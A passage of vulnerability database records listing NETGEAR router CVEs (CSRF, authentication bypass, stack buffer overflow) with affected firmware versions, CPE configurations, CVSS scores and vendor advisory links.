"url": "https://kb.netgear.com/000062820/Security-Advisory-for-Stack-based-Buffer-Overflow-Remote-Code-Execution-Vulnerability-on-Some-Routers-PSV-2020-0432"
},
{
"source": "zdi-disclosures@trendmicro.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-21-206/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000062820/Security-Advisory-for-Stack-based-Buffer-Overflow-Remote-Code-Execution-Vulnerability-on-Some-Routers-PSV-2020-0432"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-21-206/"
}
],
"sourceIdentifier": "zdi-disclosures@trendmicro.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-121"
}
],
"source": "zdi-disclosures@trendmicro.com",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-23 16:15
Modified
2024-11-21 03:20
Severity ?
Summary
Certain NETGEAR devices are affected by CSRF. This affects JR6150 before 1.0.1.10, R6050 before 1.0.1.10, R6250 before 1.0.4.12, R6300v2 before 1.0.4.8, R6700 before 1.0.1.16, R6900 before 1.0.1.16, R7300DST before 1.0.0.54, R7900 before 1.0.1.12, R8000 before 1.0.3.32, and R8500 before 1.0.2.74.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| netgear | jr6150_firmware | * | |
| netgear | jr6150 | - | |
| netgear | r6050_firmware | * | |
| netgear | r6050 | - | |
| netgear | r6250_firmware | * | |
| netgear | r6250 | - | |
| netgear | r6300_firmware | * | |
| netgear | r6300 | v2 | |
| netgear | r6700_firmware | * | |
| netgear | r6700 | - | |
| netgear | r6900_firmware | * | |
| netgear | r6900 | - | |
| netgear | r7300dst_firmware | * | |
| netgear | r7300dst | - | |
| netgear | r7900_firmware | * | |
| netgear | r7900 | - | |
| netgear | r8000_firmware | * | |
| netgear | r8000 | - | |
| netgear | r8500_firmware | * | |
| netgear | r8500 | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jr6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4B5D8AD4-6C67-4DC7-99DF-B29DBA4BC376",
"versionEndExcluding": "1.0.1.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jr6150:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D67167E5-81D2-4892-AF41-CBB6271232D1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6050_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CB4D669D-D6C4-403E-896D-55EE4EEB7C27",
"versionEndExcluding": "1.0.1.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6050:-:*:*:*:*:*:*:*",
"matchCriteriaId": "363D4DEE-98B9-4294-B241-1613CAD1A3A7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F3464F16-A6EB-47C0-B2B5-54E86743DC70",
"versionEndExcluding": "1.0.4.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F8097CEE-2577-4C44-9260-8B2DD2D2CA78",
"versionEndExcluding": "1.0.4.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1A08B1CF-6BDA-4D50-9146-2B580593FBAD",
"versionEndExcluding": "1.0.1.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7B3C16D1-4124-4CBB-8717-738E13C25C47",
"versionEndExcluding": "1.0.1.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F0EE8EBA-C4CD-4CA1-A684-54338B1254A9",
"versionEndExcluding": "1.0.0.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "59C6F6E4-C411-486E-BDBF-75F0ABEF5112",
"versionEndExcluding": "1.0.1.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F30C70DD-52EE-49C1-89B7-0D579B5090D7",
"versionEndExcluding": "1.0.3.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CC34CE8E-8DB9-4A15-80D8-EB663482A892",
"versionEndExcluding": "1.0.2.74",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by CSRF. This affects JR6150 before 1.0.1.10, R6050 before 1.0.1.10, R6250 before 1.0.4.12, R6300v2 before 1.0.4.8, R6700 before 1.0.1.16, R6900 before 1.0.1.16, R7300DST before 1.0.0.54, R7900 before 1.0.1.12, R8000 before 1.0.3.32, and R8500 before 1.0.2.74."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por una vulnerabilidad de tipo CSRF. Esto afecta a JR6150 versiones anteriores a 1.0.1.10, R6050 versiones anteriores a 1.0.1.10, R6250 versiones anteriores a 1.0.4.12, R6300v2 versiones anteriores a 1.0.4.8, R6700 versiones anteriores a 1.0.1.16, R6900 versiones anteriores a 1.0.1.16, R7300DST versiones anteriores a 1.0.0.54, R7900 versiones anteriores a 1.0.1.12, R8000 versiones anteriores a 1.0.3.32 y R8500 versiones anteriores a 1.0.2.74."
}
],
"id": "CVE-2017-18742",
"lastModified": "2024-11-21T03:20:48.703",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-23T16:15:12.570",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000051513/Security-Advisory-for-Cross-Site-Request-Forgery-on-Some-Routers-PSV-2017-0331"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000051513/Security-Advisory-for-Cross-Site-Request-Forgery-on-Some-Routers-PSV-2017-0331"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-352"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-23 17:15
Modified
2024-11-21 03:20
Severity ?
Summary
Certain NETGEAR devices are affected by authentication bypass. This affects R6300v2 before 1.0.4.8, PLW1000v2 before 1.0.0.14, and PLW1010v2 before 1.0.0.14.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| netgear | r6300_firmware | * | |
| netgear | r6300 | v2 | |
| netgear | plw1000_firmware | * | |
| netgear | plw1000 | v2 | |
| netgear | plw1010_firmware | * | |
| netgear | plw1010 | v2 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F8097CEE-2577-4C44-9260-8B2DD2D2CA78",
"versionEndExcluding": "1.0.4.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:plw1000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FA23B6B8-EC5D-4458-948E-C2793EB20EA9",
"versionEndExcluding": "1.0.0.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:plw1000:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "E09B6D87-8488-4492-8C76-44C7959618FB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:plw1010_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DFEA5486-11CD-413B-BB51-ABB718B2C253",
"versionEndExcluding": "1.0.0.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:plw1010:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C4376994-6719-4E78-8881-4F8C2E7D2937",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by authentication bypass. This affects R6300v2 before 1.0.4.8, PLW1000v2 before 1.0.0.14, and PLW1010v2 before 1.0.0.14."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por una omisi\u00f3n de autenticaci\u00f3n. Esto afecta a R6300v2 versiones anteriores a 1.0.4.8, PLW1000v2 versiones anteriores a 1.0.0.14 y PLW1010v2 versiones anteriores a 1.0.0.14."
}
],
"id": "CVE-2017-18732",
"lastModified": "2024-11-21T03:20:46.763",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 6.5,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-23T17:15:11.613",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000051523/Security-Advisory-for-Authentication-Bypass-on-R6300v2-PLW1000v2-and-PLW1010v2-PSV-2016-0069"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000051523/Security-Advisory-for-Authentication-Bypass-on-R6300v2-PLW1000v2-and-PLW1010v2-PSV-2016-0069"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-287"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-16 22:15
Modified
2024-11-21 04:39
Severity ?
Summary
Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects DGN2200v1 before 1.0.0.58, D8500 before 1.0.3.42, D7000v2 before 1.0.0.51, D6400 before 1.0.0.78, D6220 before 1.0.0.44, JNDR3000 before 1.0.0.24, R8000 before 1.0.4.18, R8500 before 1.0.2.122, R8300 before 1.0.2.122, R7900 before 1.0.2.16, R7000P before 1.3.2.34, R7300DST before 1.0.0.68, R7100LG before 1.0.0.46, R6900P before 1.3.2.34, R7000 before 1.0.9.28, R6900 before 1.0.1.46, R6700 before 1.0.1.46, R6400v2 before 1.0.2.56, R6400 before 1.0.1.42, R6300v2 before 1.0.4.28, R6250 before 1.0.4.26, WNDR3400v3 before 1.0.1.22, WNDR4500v2 before 1.0.0.72, and WNR3500Lv2 before 1.2.0.50.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "99288EE6-3A88-4134-992D-148868117AFC",
"versionEndExcluding": "1.0.0.58",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200:v1:*:*:*:*:*:*:*",
"matchCriteriaId": "F50D834B-D7B3-43D6-8072-8992FBC8C97B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "629E89E8-F329-4D11-9652-540752084DD3",
"versionEndExcluding": "1.0.3.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "52FB0300-0FC9-4797-BACB-84D7D932A386",
"versionEndExcluding": "1.0.0.51",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "D8780623-F362-4FA5-8B33-37E9CB3FEE12",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7AD596B6-3D11-456F-8BD0-2E7153BA5F53",
"versionEndExcluding": "1.0.0.78",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7D30939B-86E3-4C78-9B05-686B4994C8B9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "114EDC62-9DAE-45D9-8A90-A533BBBF50EB",
"versionEndExcluding": "1.0.0.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3EEA190-2E9C-4586-BF81-B115532FBA23",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jndr3000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "07C1E707-AB63-4812-9BBC-7267AD17BFF9",
"versionEndExcluding": "1.0.0.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jndr3000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5DEEEEE5-0798-450E-BF9D-B17A15235C80",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6C5FC237-F74C-4771-B5D3-36CF245C0396",
"versionEndExcluding": "1.0.4.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4CA2B4B5-ED8D-476F-9F6E-630B43A38E27",
"versionEndExcluding": "1.0.2.122",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DB84CB9C-DA5C-4D18-9A54-375DD091D932",
"versionEndExcluding": "1.0.2.122",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "471E4F42-7114-4A7F-832D-2E9222BD25B4",
"versionEndExcluding": "1.0.2.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6CA65438-6431-4169-8CB3-3F19996C4F74",
"versionEndExcluding": "1.3.2.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "94B3A9D8-A276-41B2-B7BF-7DA58B879A9B",
"versionEndExcluding": "1.0.0.68",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E59E66D2-7E73-45C8-8D3E-FE589CDBECA4",
"versionEndExcluding": "1.0.0.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A107B2DF-069F-4B11-8272-DB1630A3E985",
"versionEndExcluding": "1.3.2.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "577AD463-2E99-4D07-BF12-1D40AC88B3FC",
"versionEndExcluding": "1.0.9.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "08FF0010-66E3-485C-A22B-39E57E738550",
"versionEndExcluding": "1.0.1.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4E821B01-31C8-4766-BAAF-D814336617B9",
"versionEndExcluding": "1.0.1.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "203541F7-8AC5-436A-808E-935B03B00E8D",
"versionEndExcluding": "1.0.2.56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "741413AB-9519-4BBE-BEDB-DFA2077BAF79",
"versionEndExcluding": "1.0.1.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "502055F1-F919-4C91-A3D0-B144027BC690",
"versionEndExcluding": "1.0.4.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
